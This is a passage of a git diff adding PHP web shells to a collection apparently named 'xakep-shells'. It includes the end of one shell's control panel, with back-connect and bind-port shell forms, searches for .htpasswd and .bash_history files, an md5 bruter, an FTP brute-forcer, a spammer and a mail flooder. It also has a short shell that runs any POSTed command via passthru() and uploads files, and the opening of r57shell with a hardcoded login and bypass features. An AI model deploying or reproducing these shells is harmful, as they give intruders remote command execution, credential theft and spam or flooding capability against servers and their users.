+<input type=hidden name="type" value=6>
+</td></tr>
+<tr><td colspan=2>
+<font size=2 color=#888888>New name:</b>
+<input type=text size=15 name="newname" class=ta>
+</td><td width=4></td><td colspan=2>
+<input type=file name="userfile" size=28>
+</td></tr>
+</table></form>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Alias::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="RUN">
+<input type=hidden name="type" value=7>
+</td></tr>
+<tr><td colspan=2>
+<select name='value' class='ta' width=200>
+<option>find apahce config file</option>
+<option>find access_log files</option>
+<option>find error_log files</option>
+<option>find suid files</option>
+<option>find suid files in current dir</option>
+<option>find sgid files</option>
+<option>find sgid files in current dir</option>
+<option>find config.inc.php files</option>
+<option>find config.inc.php files in current dir</option>
+<option>find config* files</option>
+<option>find config* files in current dir</option>
+<option>find all writable files</option>
+<option>find all writable files in current dir</option>
+<option>find all writable directories</option>
+<option>find all writable directories in current dir</option>
+<option>find all writable directories and files</option>
+<option>find all writable directories and files in current dir</option>
+<option>find all service.pwd files</option>
+<option>find service.pwd files in current dir</option>
+<option>find all .htpasswd files</option>
+<option>find .htpasswd files in current dir</option>
+<option>find all .bash_history files</option>
+<option>find .bash_history files in current dir</option>
+<option>find all .mysql_history files</option>
+<option>find .mysql_history files in current dir</option>
+<option>find all .fetchmailrc files</option>
+<option>find .fetchmailrc files in current dir</option>
+<option>list file attributes on a Linux second extended file system</option>
+<option>show opened ports</option>
+<option>---------------------------------------------------------------------------------------------------------</option>
+</select>
+</td></tr>
+</table></form></td>
+<script>
+function base64Encode(str)
+{
+	var charBase64 = new Array(
+		'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
+		'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
+		'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
+		'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+	var len = str.length;
+
+	do
+	{
+		chr1 = str.charCodeAt(i++);
+		chr2 = str.charCodeAt(i++);
+		chr3 = str.charCodeAt(i++);
+
+
+		enc1 = chr1 >> 2;
+		enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
+		enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
+		enc4 = chr3 & 0x3F;
+
+		out += charBase64[enc1] + charBase64[enc2];
+
+		if (isNaN(chr2))
+  		{
+			out += '==';
+		}
+  		else if (isNaN(chr3))
+  		{
+			out += charBase64[enc3] + '=';
+		}
+		else
+		{
+			out += charBase64[enc3] + charBase64[enc4];
+		}
+	}
+	while (i < len);
+
+	return out;
+}
+
+
+function base64Decode(str)
+{
+	var indexBase64 = new Array(
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
+		52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
+		-1, 0, 1, 2,  3, 4, 5, 6,  7, 8, 9,10, 11,12,13,14,
+		15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
+		-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
+		41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+
+	str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
+
+	var len = str.length;
+
+	do
+	{
+		enc1 = indexBase64[str.charCodeAt(i++)];
+		enc2 = indexBase64[str.charCodeAt(i++)];
+		enc3 = indexBase64[str.charCodeAt(i++)];
+		enc4 = indexBase64[str.charCodeAt(i++)];
+
+		chr1 = (enc1 << 2) | (enc2 >> 4);
+		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+		chr3 = ((enc3 & 3) << 6) | enc4;
+
+		out += String.fromCharCode(chr1);
+
+		if (enc3 != -1)
+		{
+			out += String.fromCharCode(chr2);
+		}
+		if (enc4 != -1)
+		{
+			out += String.fromCharCode(chr3);
+		}
+	}
+	while (i < len);
+
+	if (i != len)
+	{
+		new Error(BASE64_BROKEN);
+		return "";
+	}
+
+	return out;
+}
+
+</script>
+<td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td width=1%>
+<b>.::Base64_encode::.</b>
+</td><td align=right width=6%>
+<input type=button value="encode" class='bt' onclick='t.value=base64Encode(t.value)'>	
+</td>
+<form action method=POST><td width=1%>
+<b>.::Base64_decode::.</b>
+</td><td align=right width=6%>
+<input type=button value="decode" class='bt' onclick='n.value=base64Decode(n.value)'>	
+</td></tr>
+<tr><td colspan=2>
+<input type=text name='t' class='ta' size=34>
+</td><td colspan=2>
+<input type=text name='n' class='ta' size=34>
+</td></tr>
+</table></form>
+</td></tr>
+</td></tr>
+</table>
+</td></tr><tr></tr><tr><td>
+<table cellpadding=0 cellspacing=0><tr><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Back Connect::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>IP:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='ip' size=15 value=<?php echo $_SERVER['REMOTE_ADDR'];?>></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>port:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=10 value='5000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Connect' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Bind port::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>Port:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=15 value='6000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>pass:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='pass' size=10 value='hshell'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Bind' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td width=50% height=141>
+<table class='td1' width=100% height=100% valign=top><tr><td width=100% height=100% class='td2' valign=top>
+<table cellpadding=0 cellspacing=0 width=95%><tr><td colspan=4>
+<b>.::md5 bruter::.</b>
+</td></tr><tr><td height=10></td></tr>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right><b>hash:</b></font></td><td width=5></td><td align=right>
+<input type=text name='hash' class='ta' size=50>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>log_file:</font></td><td width=5></td><td align=right>
+<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>dictionary_file:</font></td><td width=5></td><td align=right>
+<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+</td><td width=5></td><td align=right>
+<input type=submit class='bt' value='Start Brute'>
+</td></tr>
+</table>
+</td></tr></table>
+</td></tr></table>
+<tr></tr><tr><td>
+<table class='td1' width=100% height=310 valign=top align=left>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Spammer::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>emails_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='elist' class='ta' size=17 value="emails.txt">
+</td></tr><tr><td height=5></td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mail_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Start">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td colspan=3 height=30 valign=top><b>.::FTP-Brute::.</b></td></tr>
+<tr><td width=31% align=right>
+<font color=#888888 size=2><b>Host:</b></font>
+</td><td align=right>
+<input type=text name='host' class='ta' size=28>
+</td><td width=5%></td></tr><tr><td height=35 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_users file:</font>
+</td><td align=right>
+<input type=text name='users' class='ta' size=17 value="ftp_users.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_passwd file:</font>
+</td><td align=right>
+<input type=text name='passwd' class='ta' size=17 value="ftp_passwds.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_log file:</font>
+</td><td align=right>
+<input type=text name='log' class='ta' size=17 value="ftp_log.txt">
+</td><td></td></tr>
+<tr><td colspan=2 height=20></td></tr>
+<tr><td colspan=2 align=right>
+<input type=submit class='bt' value="Start Brute">
+<input type=hidden name="type" value=9>
+</td></tr>
+</td></table></form>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Flooder::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mflood_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Send to:</font>
+</td><td width=65% align=right>
+<input type=text name='to' class='ta' size=27>
+</td></tr><tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=25><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Amount:</font>
+</td><td width=65% align=right>
+<input type=text name='amount' class='ta' size=17>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Flood">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+</table></center>
+<center><font size=1 color=#444444>.:[Public v1.0]:.</font></center>
+</body>
+</html>
+	
+<!-- Coded by LoFFi & Ls01r //-->
\ No newline at end of file
diff --git a/xakep-shells/PHP/pws.php.php.txt b/xakep-shells/PHP/pws.php.php.txt
new file mode 100644
index 0000000..cf979a1
--- /dev/null
+++ b/xakep-shells/PHP/pws.php.php.txt
@@ -0,0 +1,35 @@
+<html>
+<head>
+<div align="left"><font size="1">Input command :</font></div>
+<form name="cmd" method="POST" enctype="multipart/form-data">
+<input type="text" name="cmd" size="30" class="input"><br>
+<pre>
+<?php
+if ($_POST['cmd']){
+$cmd = $_POST['cmd'];
+passthru($cmd);
+}
+?>
+</pre>
+<hr>
+<div align="left"><font size="1">Uploader file :</font></div>
+
+<?php
+$uploaded = $_FILES['file']['tmp_name'];
+if (file_exists($uploaded)) {
+   $pwddir = $_POST['dir'];
+   $real = $_FILES['file']['name'];
+   $dez = $pwddir."/".$real;
+   copy($uploaded, $dez);
+   echo "FILE UPLOADED TO $dez";
+}
+?>     </pre>
+<form name="form1" method="post" enctype="multipart/form-data">
+ <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
+ <input type="submit" name="submit2" value="Upload">
+ <input type="file" name="file" size="15">
+	  </td>
+    </tr>
+</table>
+</body>
+</html>
diff --git a/xakep-shells/PHP/r57 Shell.php.php.txt b/xakep-shells/PHP/r57 Shell.php.php.txt
new file mode 100644
index 0000000..51ca60e
--- /dev/null
+++ b/xakep-shells/PHP/r57 Shell.php.php.txt	
@@ -0,0 +1,1925 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû  íà ñåðâåðå ÷åðåç áðàóçåð
+/*  Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåðñèÿ: 1.22
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/******************************************************************************************************/
+
+/* ~~~ Íàñòðîéêè  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.22";
+
+// $HTTP_POST_VARS --> $_POST
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+
+/* magic_quotes */
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k]=stripslashes($v);
+  }
+ }
+
+/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
+
+// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
+// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
+$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
+$pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
+
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"r57shell\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+$head = '<!-- Çäðàâñòâóé  Âàñÿ -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+
+
+/* show phpinfo */
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+/* delete script */
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+/* delete tmp files */
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+/* show php.ini vars */
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+
+ function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+/* info about cpu */
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/* info about mem */
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+
+/*
+Âûáîð ÿçûêà
+$language='ru' - ðóññêèé
+$language='eng' - àíãëèéñêèé
+*/
+$language='ru';
+
+$lang=array(
+'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
+'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
+'ru_text3' =>'Âûïîëíèòü êîìàíäó',
+'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
+'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
+'ru_text6' =>'Ëîêàëüíûé ôàéë',
+'ru_text7' =>'Àëèàñû',
+'ru_text8' =>'Âûáåðèòå àëèàñ',
+'ru_butt1' =>'Âûïîëíèòü',
+'ru_butt2' =>'Çàãðóçèòü',
+'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
+'ru_text10'=>'Îòêðûòü ïîðò',
+'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
+'ru_butt3' =>'Îòêðûòü',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-àäðåñ',
+'ru_text14'=>'Ïîðò',
+'ru_butt4' =>'Âûïîëíèòü',
+'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
+'ru_text16'=>'Èñïîëüçîâàòü',
+'ru_text17'=>'Óäàëåííûé ôàéë',
+'ru_text18'=>'Ëîêàëüíûé ôàéë',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'Èñïîëüçîâàòü',
+'ru_text21'=>'Íîâîå èìÿ',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Ëîêàëüíûé ïîðò',
+'ru_text24'=>'Óäàëåííûé õîñò',
+'ru_text25'=>'Óäàëåííûé ïîðò',
+'ru_text26'=>'Èñïîëüçîâàòü',
+'ru_butt5' =>'Çàïóñòèòü',
+'ru_text28'=>'Ðàáîòà â safe_mode',
+'ru_text29'=>'Äîñòóï çàïðåùåí',
+'ru_butt6' =>'Ñìåíèòü',
+'ru_text30'=>'Ïðîñìîòð ôàéëà',
+'ru_butt7' =>'Âûâåñòè',
+'ru_text31'=>'Ôàéë íå íàéäåí',
+'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
+'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
+'ru_butt8' =>'Ïðîâåðèòü',
+'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
+'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
+'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;Áàçà',
+'ru_text37'=>'Ëîãèí',
+'ru_text38'=>'Ïàðîëü&nbsp;&nbsp;',
+'ru_text39'=>'Òàáëèöà',
+'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
+'ru_butt9' =>'Äàìï',
+'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
+'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
+'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
+'ru_butt10'=>'Ñîõðàíèòü',
+'ru_butt11'=>'Ðåäàêòèðîâàòü',
+'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
+'ru_text45'=>'Ôàéë ñîõðàíåí',
+'ru_text46'=>'Ïðîñìîòð phpinfo()',
+'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
+'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
+'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
+'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
+'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
+'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text53'=>'Èñêàòü â ïàïêå',
+'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
+'ru_butt12'=>'Íàéòè',
+'ru_text55'=>'Òîëüêî â ôàéëàõ',
+'ru_text56'=>'Íè÷åãî íå íàéäåíî',
+'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
